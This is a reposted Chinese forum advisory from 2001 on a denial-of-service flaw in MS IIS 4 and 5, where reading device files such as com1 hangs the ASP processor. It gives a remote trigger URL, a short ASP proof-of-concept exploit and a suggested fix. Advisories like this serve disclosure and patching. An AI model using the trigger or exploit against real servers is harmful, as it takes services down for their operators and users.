发信人: peking(PEKING)
整理人: williamlong(2001-07-16 15:06:31), 站内信件
|
MS IIS 拒绝服务漏洞 (MS,缺陷)
整理编辑:China ASP
涉及程序:
MS IIS
描述:
利用设备文件导致 MS IIS 拒绝服务漏洞
详细:
发现 MS IIS 存在本地和远程拒绝服务漏洞。当使用 Scripting.FileSystemObject 打开或读取设备文件时 (com1, com2, etc.) 将会导致 ASP-processor (asp.dll) 停止响应。
对于本地攻击者,如果有创建 .asp 文件的权限,将能导致服务器当机。
对于远程攻击,当参数被解析成设备文件时,将会导致服务器当机:
http://host.int/scripts/script.asp?script=com1
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
ASP-Exploit:
<%
Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>
受影响系统:
IIS 4,5
解决方案:
修补 Scripting.FileSystemObject ,使它在打开一个文件之前必须检查其是否存在
(转)
加入时间:2001-7-11
阅读次数:136
|
|